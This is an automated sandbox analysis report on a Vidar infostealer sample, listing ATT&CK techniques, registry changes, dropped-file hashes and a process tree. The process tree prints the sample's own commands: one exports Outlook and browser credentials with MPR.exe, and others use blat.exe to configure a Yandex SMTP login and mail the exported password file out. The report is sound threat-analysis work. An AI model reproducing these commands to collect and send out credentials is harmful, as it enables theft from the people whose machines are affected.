vidar | aa6a6c1eb82a2226946431481ad54d4ab65f1bff3059506a370d66ee0378032f

Analysis

max time kernel
22s
max time network
25s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
10-08-2024 09:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe
Size

1.2MB
MD5

859fd7f4cb8cf72aea499822455491eb
SHA1

f8c8087d7931b643cd248dad75914586a06b0e15
SHA256

aa6a6c1eb82a2226946431481ad54d4ab65f1bff3059506a370d66ee0378032f
SHA512

0e5ab9ac15f904defa341bf6390eb5f6d6498969162eff36a45bec41f0a6e8292e29da87f44299e11912a398bcedc95bf354832d9678b886c732aa170cf01b7b
SSDEEP

24576:R8vDqXCTbpAzuY81lXqiC6iHvHJAs+9kAHhgkOX3gud4Phgyzma:RJXm8ulzHjs2s+9ukOv3yaa

Score

10^/10

vidar collection credential_access discovery spyware stealer upx

Malware Config

Signatures

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Executes dropped EXE 3 IoCs

pid	Process
2644	blat.exe
2924	MPR.exe
2380	blat.exe

Loads dropped DLL 5 IoCs

pid	Process
2908	cmd.exe
2908	cmd.exe
2908	cmd.exe
2908	cmd.exe
2908	cmd.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1052-4-0x0000000000400000-0x0000000000798000-memory.dmp	upx
behavioral1/memory/1052-10-0x0000000000400000-0x0000000000798000-memory.dmp	upx
behavioral1/memory/1052-11-0x0000000000400000-0x0000000000798000-memory.dmp	upx
behavioral1/memory/1052-9-0x0000000000400000-0x0000000000798000-memory.dmp	upx
behavioral1/memory/1052-6-0x0000000000400000-0x0000000000798000-memory.dmp	upx
behavioral1/memory/1052-58-0x0000000000400000-0x0000000000798000-memory.dmp	upx
behavioral1/memory/1052-75-0x0000000000400000-0x0000000000798000-memory.dmp	upx

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	MPR.exe

Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	MPR.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1560 set thread context of 1052	1560	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	29

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	blat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MPR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	blat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3060	PING.EXE

Modifies registry class 24 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpf\MediaPackageFile\ShellNew	MPR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\BrowserFlags = "8"	MPR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\EditFlags = "0"	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\DefaultIcon	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open\command	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler"	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID	MPR.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpf\MediaPackageFile	MPR.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpf	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler\Clsid	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpf	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "MPR.DocHostUIHandler"	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mpf\ = "mprf"	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6ED9.tmp\\MPR.exe,0"	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mprf\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6ED9.tmp\\MPR.exe \"%1\""	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6ED9.tmp\\MPR.exe"	MPR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler\ = "Implements DocHostUIHandler"	MPR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MPR.DocHostUIHandler\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}"	MPR.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3060	PING.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2924	MPR.exe
2924	MPR.exe
2924	MPR.exe
2924	MPR.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
460	Process not Found

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2924	MPR.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1560	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe
2924	MPR.exe
2924	MPR.exe

Suspicious use of WriteProcessMemory 29 IoCs

description	pid	Process	procid_target
PID 1560 wrote to memory of 1052	1560	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	29
PID 1560 wrote to memory of 1052	1560	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	29
PID 1560 wrote to memory of 1052	1560	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	29
PID 1560 wrote to memory of 1052	1560	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	29
PID 1560 wrote to memory of 1052	1560	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	29
PID 1560 wrote to memory of 1052	1560	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	29
PID 1560 wrote to memory of 1052	1560	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	29
PID 1560 wrote to memory of 1052	1560	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	29
PID 1560 wrote to memory of 1052	1560	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	29
PID 1052 wrote to memory of 2908	1052	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	30
PID 1052 wrote to memory of 2908	1052	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	30
PID 1052 wrote to memory of 2908	1052	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	30
PID 1052 wrote to memory of 2908	1052	859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe	30
PID 2908 wrote to memory of 3060	2908	cmd.exe	32
PID 2908 wrote to memory of 3060	2908	cmd.exe	32
PID 2908 wrote to memory of 3060	2908	cmd.exe	32
PID 2908 wrote to memory of 3060	2908	cmd.exe	32
PID 2908 wrote to memory of 2644	2908	cmd.exe	33
PID 2908 wrote to memory of 2644	2908	cmd.exe	33
PID 2908 wrote to memory of 2644	2908	cmd.exe	33
PID 2908 wrote to memory of 2644	2908	cmd.exe	33
PID 2908 wrote to memory of 2924	2908	cmd.exe	34
PID 2908 wrote to memory of 2924	2908	cmd.exe	34
PID 2908 wrote to memory of 2924	2908	cmd.exe	34
PID 2908 wrote to memory of 2924	2908	cmd.exe	34
PID 2908 wrote to memory of 2380	2908	cmd.exe	35
PID 2908 wrote to memory of 2380	2908	cmd.exe	35
PID 2908 wrote to memory of 2380	2908	cmd.exe	35
PID 2908 wrote to memory of 2380	2908	cmd.exe	35

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	MPR.exe

C:\Users\Admin\AppData\Local\Temp\859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1560
- C:\Users\Admin\AppData\Local\Temp\859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\859fd7f4cb8cf72aea499822455491eb_JaffaCakes118.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1052
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\1.bat" "
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2908
  - - C:\Windows\SysWOW64\PING.EXE
      ping ya.ru -n 5
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3060
  - - C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\blat.exe
      blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u super.siteedit -pw 5255251
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2644
  - - C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\MPR.exe
      mpr.exe /export
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook accounts
      Accesses Microsoft Outlook profiles
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      outlook_win_path
      PID:2924
  - - C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\blat.exe
      blat.exe -body PassReg -to [email protected] -attach pass.mpf
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\1.bat

Filesize
359B

MD5
c311aa83d8effd9bceaa2d98deeb93e7

SHA1
11f3359260f4a74b0fa494740e1e1798f83ce863

SHA256
0101942c776d9a16b3704c4cd91138e007f7e4da66fea585fe2daadef950827f

SHA512
8d4d5080b63c3280d39cdabb9772eb937bec76c7e49eda0ec22c3e7a392b83cbe885cb99ead94ad507cfcd9a222b93b58aadfe1be5e2445c8783a55859df515a

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\HookLib.dll

Filesize
42KB

MD5
9b2e0db7547afab728ec31b7288705d6

SHA1
cedd09c5fda6c9445d191f97034e23e960361074

SHA256
ff44a0fe9d27fc3c1f455b2b9e989235ea55be4b95ed569be4b15129e624214b

SHA512
1c4c5eb672541a0fd39ed1174bdd3533e136233bd904c2e8bc7ffcab4f3e9835cbc357a66c6704619795ce983ce57a6a8a206aa922addfcc771dd14c277cdf33

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\SAV_MVFYZPLM_8.10.2024_9-45-11_AM.mpf

Filesize
20KB

MD5
92c9ca2823ee9481ac53d78d0126e894

SHA1
5c92e6c760bf68304292d54d2766701531a067e2

SHA256
7c643d59fcf98cdce6e739f7a6c25a2622fff9d4e557d06f2cf66bdf853eaf2c

SHA512
77fc6903af1561054a70ae6e9aea3dee1d393f40108433d8e8f06a9f1c139f44d660d696cd7635246b4ae37f1de92b8f5a186f81692282374a936ea2ba4b6081

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\blat.dll

Filesize
120KB

MD5
724cae63522f6e5f7565a3bf4b2a719b

SHA1
18620dbd4357d85918070f669ff4b61755290757

SHA256
b87814eaf1cd5268e797f1119b58e3fd79381af3f530be9a90993198cbce1779

SHA512
af68749cadf9920a8bed455a2557b1faf475d30fdd62f45da6757fbc5a59341fffeccca4ff646b334da95cf673deeeea74bdbb27a16f510a4e3309055f89817d

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\blat.lib

Filesize
2KB

MD5
3cd3cffda2b5108e2778f94429c624d6

SHA1
3e4d218d1b8eb4fa1ab5152b126951892aff3dc9

SHA256
b545194041588fc0a6f57e7eb5a93d2418aaa263d246e3c696a79ee5859770ff

SHA512
c80080afcc982c4e950876756fb32c7f24fbe45bfbbe78afe144be1ede86dc9ef1e57db95d3df7f4c6011fd226f23684b929781b55d1be659cfa75d14f8d0c79

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\block_reader.sys

Filesize
1KB

MD5
b5a0cfd3e6cb42a29255faa1546f420c

SHA1
c55cb0f7b5a04231607498b83629e70105113ee3

SHA256
a2d200514887c6f05c9e6150b57cf4541c4923b857cf15723454885b9353dff0

SHA512
274a7371f1d75803926380fd10c60c9aa1bb1088594e3e0be5db255bb9f31ae178e8f79ba4b2deb49c24289dea5b17d1244c873e038d0a94159252ab62f4342e

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ED9.tmp\mpr.ini

Filesize
259B

MD5
3d4e4dc00c0be2d8b0762bedcedf6423

SHA1
cb24655abe244d225d2abfd92d3de5e32719ed65

SHA256
c80309abdb6ee682f4ec538f68a16e9b2732913b0193978fdb0d9221eb4f7528

SHA512
5145007b259e166bf11d8638833e34ae553ba8244b1b97710129b0faa0bbc0c4560e567a9707a38797756819004bd4b592cd1b708d95e28cc244df7dfe65635f

Download Submit
\Users\Admin\AppData\Local\Temp\6ED9.tmp\MPR.exe

Filesize
3.3MB

MD5
8dba37604bf06ebcef07dd1085865a6a

SHA1
1202eb0ea461c502daa7da9d7d75fff226bf57bd

SHA256
038ab25642a1220c27028d0b559062b43764c66541ec07a96b2a99d25d9638b0

SHA512
0f286677e964d733ea3270f0f196769d8ddddb4a6bb3007187eae56e9abb5e22ee984703df5356b5d9049e5ad3b24c567ae13773684113a4440b2cce5d0132fa

Download Submit
\Users\Admin\AppData\Local\Temp\6ED9.tmp\blat.exe

Filesize
112KB

MD5
31f84e433e8d1865e322998a41e6d90e

SHA1
cbea6cda10db869636f57b1cffad39b22e6f7f17

SHA256
aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e

SHA512
7ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9

Download Submit
memory/1052-6-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download
memory/1052-9-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download
memory/1052-58-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download
memory/1052-11-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download
memory/1052-10-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download
memory/1052-4-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download
memory/1052-75-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download
memory/1560-0-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/1560-7-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/1560-8-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/1560-3-0x00000000001C0000-0x00000000001D7000-memory.dmp

Filesize
92KB

Download
memory/2924-64-0x0000000000500000-0x000000000084A000-memory.dmp

Filesize
3.3MB

Download